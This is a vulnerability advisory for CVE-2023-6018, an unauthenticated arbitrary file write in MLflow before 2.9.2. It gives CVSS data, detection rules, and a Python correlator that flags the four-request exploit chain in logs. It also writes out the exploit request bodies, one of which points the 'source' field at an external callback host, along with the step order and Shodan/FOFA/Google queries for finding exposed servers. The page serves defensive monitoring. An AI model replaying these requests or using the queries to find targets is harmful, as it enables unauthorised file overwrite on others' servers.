CVE-2023-6018
published 2023-11-16

CVE-2023-6018: An attacker can overwrite any file on the server hosting MLflow without any authentication.

Priority: P180, critical, 9.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EXPLOIT
EPSS: 47.87% (98.7th percentile)

Affected

2 ranges

Vendor   Product         Version range          Fixed in
mlflow   mlflow_mlflow   >= 0 < 2.9.2           2.9.2
mlflow   mlflow_mlflow   unspecified – latest

Detection & IOCs (extracted from sources)

url: /ajax-api/2.0/mlflow/registered-models/create
url: /ajax-api/2.0/mlflow/model-versions/create
url: /model-versions/get-artifact?path=random&name={{model_name}}&version=2
command: {"name": "{{model_name}}", "source": "http://{{interactsh-url}}/api/2.0/mlflow-artifacts/artifacts/"}
command: {"name": "{{model_name}}", "source": "models:/{{model_name}}/1"}
  • Monitor for unauthenticated POST requests to /ajax-api/2.0/mlflow/registered-models/create and /ajax-api/2.0/mlflow/model-versions/create — these are the first two steps of the exploit chain.
  • Detect model-version creation requests where the 'source' field contains an external HTTP URL (SSRF/arbitrary-write pivot), particularly pointing to /api/2.0/mlflow-artifacts/artifacts/.
  • Detect model-version creation requests where the 'source' field uses the models:/ URI scheme referencing a previously created model, which is the second stage of the exploit chain and enables the arbitrary file write.
  • Monitor GET requests to /model-versions/get-artifact with arbitrary path parameters — this endpoint is used to trigger the file write in the final exploit step.
  • Use Shodan/FOFA to identify exposed MLflow instances as potential targets: Shodan query http.title:"mlflow", FOFA queries title="mlflow" or app="mlflow", Google dork intitle:"mlflow".
  • Confirm exploitation by checking for an outbound HTTP interaction (OOB callback) triggered during model-version creation with an external source URL — a successful callback indicates the server fetched the attacker-controlled URL.
  • Validate MLflow API responses for the presence of 'registered_model' and 'name' fields in the body to confirm a live, exploitable MLflow instance.
  • The exploit requires a sequence of exactly 4 HTTP requests (max-request: 4): create a registered model, create a model version with an external HTTP source, create a second model version with a models:/ source referencing the first, then trigger artifact retrieval. All steps must succeed for arbitrary file write.
  • No authentication is required for any of the four exploit steps; the vulnerability is exploitable by completely unauthenticated attackers.
  • The exploit is classified as intrusive (tag: intrusive): running detection probes will actively create registered models and model versions on the target MLflow instance.
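
The monitoring rules above can be combined into a passive log correlator that flags a client only when its requests walk all four stages in order. This is an added example, not code from MLflow or from the sources this page summarizes; the record fields (client, method, url, body) and the sample records are assumptions about what a reverse proxy or WAF with body logging would provide.

```python
import json
from urllib.parse import parse_qs, urlsplit

CHAIN = ["create-model", "version-http-source", "version-models-source", "get-artifact"]

def classify(ev):
    """Map one request record to a stage of the chain, or None if unrelated."""
    url, method = urlsplit(ev["url"]), ev["method"].upper()
    if method == "GET" and url.path.endswith("/model-versions/get-artifact"):
        return "get-artifact" if "path" in parse_qs(url.query, keep_blank_values=True) else None
    if method != "POST":
        return None
    if url.path.endswith("/mlflow/registered-models/create"):
        return "create-model"
    if url.path.endswith("/mlflow/model-versions/create"):
        try:
            source = json.loads(ev.get("body") or "{}").get("source")
            scheme = urlsplit(source).scheme.lower() if isinstance(source, str) else ""
        except (ValueError, AttributeError):   # malformed body or unparsable source
            return None
        if scheme in ("http", "https"):        # external fetch target in 'source'
            return "version-http-source"
        if scheme == "models":                 # models:/ reference to an earlier version
            return "version-models-source"
    return None

def find_chains(events):
    """Return clients whose requests walk all four stages in order (events sorted by time)."""
    progress, alerts = {}, []
    for ev in events:
        stage, step = classify(ev), progress.get(ev["client"], 0)
        if stage == CHAIN[step]:
            progress[ev["client"]] = step = step + 1
            if step == len(CHAIN):
                alerts.append(ev["client"])
                progress[ev["client"]] = 0
    return alerts

# Constructed sample records (documentation IP ranges, placeholder hosts and names).
V = "/ajax-api/2.0/mlflow/model-versions/create"
SAMPLE = [
    {"client": "203.0.113.7", "method": "POST", "url": "/ajax-api/2.0/mlflow/registered-models/create", "body": '{"name": "m1"}'},
    {"client": "198.51.100.9", "method": "POST", "url": V, "body": '{"name": "prod", "source": "s3://bucket/run/1"}'},
    {"client": "203.0.113.7", "method": "POST", "url": V, "body": '{"name": "m1", "source": "http://remote.example/api/2.0/mlflow-artifacts/artifacts/"}'},
    {"client": "203.0.113.7", "method": "POST", "url": V, "body": '{"name": "m1", "source": "models:/m1/1"}'},
    {"client": "198.51.100.9", "method": "GET", "url": "/model-versions/get-artifact?path=MLmodel&name=prod&version=1"},
    {"client": "203.0.113.7", "method": "GET", "url": "/model-versions/get-artifact?path=random&name=m1&version=2"},
]

if __name__ == "__main__":
    for ev in SAMPLE:
        print(ev["client"], classify(ev))
    print("chain completed by:", find_chains(SAMPLE))
```

Single-stage hits from classify() are still worth alerting on individually; the ordered correlation only raises confidence and keeps ordinary registry traffic, such as the s3:// record in the sample, out of the alert.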

CVSS provenance

nvd   v3.1   9.8    CRITICAL   CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd   v3.0   10.0   CRITICAL   CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H